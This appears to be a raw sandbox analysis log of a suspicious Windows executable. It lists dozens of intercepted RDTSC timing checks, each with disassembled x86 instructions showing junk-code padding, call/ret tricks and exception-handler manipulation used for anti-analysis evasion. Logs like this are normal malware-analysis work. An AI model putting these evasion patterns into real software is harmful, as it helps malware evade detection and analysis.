Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE87DC second address: CE87E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE87E0 second address: CE87E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE87E4 second address: CE880E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F768C6F8115h 0x0000000c jo 00007F768C6F8106h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE9935 second address: CE9939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE9939 second address: CE993D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE993D second address: CE9943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CE9AE4 second address: CE9AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CEEDB8 second address: CEEDEE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F768C6F6316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F768C6F6325h 0x0000000f jmp 00007F768C6F6323h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CEEDEE second address: CEEDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CEF673 second address: CEF679 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CEFFAA second address: CEFFC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F810Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF01AF second address: CF01C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF01C3 second address: CF01C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF2044 second address: CF204A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF204A second address: CF204F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF204F second address: CF20A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+122D220Bh], ebx 0x00000010 xor si, 3150h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F768C6F6318h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D37C1h] 0x00000037 push 00000000h 0x00000039 sub dword ptr [ebp+1246E266h], ebx 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jc 00007F768C6F6316h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF47D0 second address: CF483F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F768C6F8108h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 call 00007F768C6F8113h 0x0000002c jmp 00007F768C6F8112h 0x00000031 pop esi 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F768C6F8115h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF4518 second address: CF451C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF483F second address: CF4844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF6CFE second address: CF6D14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF6D14 second address: CF6D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF6D18 second address: CF6D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F6322h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F768C6F6331h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F768C6F631Bh 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF7352 second address: CF7380 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F768C6F8106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007F768C6F8127h 0x00000012 pushad 0x00000013 jmp 00007F768C6F8119h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF7EAC second address: CF7EC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFBC70 second address: CFBC7B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFCCB2 second address: CFCCB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFCF04 second address: CFCF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFCF08 second address: CFCF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFED2C second address: CFED30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFED30 second address: CFED36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFCF0E second address: CFCF41 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F768C6F8119h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F768C6F8108h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F768C6F810Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D011A9 second address: D011AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0125F second address: D0126B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0230B second address: D02310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D030B5 second address: D030BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D04255 second address: D04259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D05233 second address: D05243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F810Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D05243 second address: D0526F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F6320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F768C6F6325h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0526F second address: D05274 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB6BA2 second address: CB6BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB6BA7 second address: CB6BC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F810Fh 0x00000007 jng 00007F768C6F8112h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CB6BC0 second address: CB6BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0D934 second address: D0D9A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F810Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov bx, 68A6h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F768C6F8108h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov bl, 17h 0x0000002e jno 00007F768C6F8106h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F768C6F8108h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 stc 0x00000051 xchg eax, esi 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0D9A5 second address: D0D9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0D9A9 second address: D0D9BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D07C0B second address: D07C22 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F768C6F631Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0B4F7 second address: D0B4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D07C22 second address: D07C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D10A67 second address: D10A6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D08D7B second address: D08D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0B4FB second address: D0B57E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F768C6F810Fh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F768C6F8119h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push esi 0x0000001a mov ebx, dword ptr [ebp+122D395Dh] 0x00000020 pop edi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 pushad 0x00000029 jnp 00007F768C6F8108h 0x0000002f pushad 0x00000030 popad 0x00000031 mov ecx, 70472D87h 0x00000036 popad 0x00000037 mov eax, dword ptr [ebp+122D05C5h] 0x0000003d push edx 0x0000003e sub edi, dword ptr [ebp+122D2F98h] 0x00000044 pop edi 0x00000045 push FFFFFFFFh 0x00000047 sub edi, 3BFF58F1h 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 jmp 00007F768C6F8111h 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0DB3A second address: D0DB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+12452CE7h], eax 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push ebx 0x00000017 mov dword ptr [ebp+122D2D9Bh], ecx 0x0000001d pop ebx 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov di, si 0x00000028 mov eax, dword ptr [ebp+122D0FF5h] 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F768C6F6318h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 or di, EC40h 0x0000004d push FFFFFFFFh 0x0000004f mov ebx, dword ptr [ebp+122D3955h] 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b je 00007F768C6F6316h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0E9F0 second address: D0E9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D0FB8A second address: D0FB8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D07C26 second address: D07C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D07C2A second address: D07C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D07C30 second address: D07C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D18AAB second address: D18AC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F768C6F631Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D1C646 second address: D1C65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F768C6F8112h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D1C65F second address: D1C663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D238BA second address: D238C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D23B70 second address: D23B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D23B74 second address: D23B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F768C6F810Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D23B89 second address: D23B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F768C6F6316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D23B93 second address: D23BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8116h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D23CF1 second address: D23CF7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2A82F second address: D2A85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 ja 00007F768C6F8106h 0x00000016 pop edi 0x00000017 jmp 00007F768C6F8115h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2A85B second address: D2A876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F768C6F6324h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2A876 second address: D2A87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2A87F second address: D2A883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2948E second address: D2949E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F768C6F8106h 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2949E second address: D294A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29758 second address: D2975C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2975C second address: D2977A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F768C6F6321h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2977A second address: D2978D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F768C6F8106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F768C6F8106h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2978D second address: D29793 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29793 second address: D297B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F768C6F8116h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29A1B second address: D29A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F6327h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F768C6F6324h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29B8F second address: D29B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29B97 second address: D29B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29B9B second address: D29BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jl 00007F768C6F8106h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29BAD second address: D29BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F768C6F6316h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29BB9 second address: D29BC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a ja 00007F768C6F8106h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29D07 second address: D29D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F768C6F6327h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29FD2 second address: D29FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
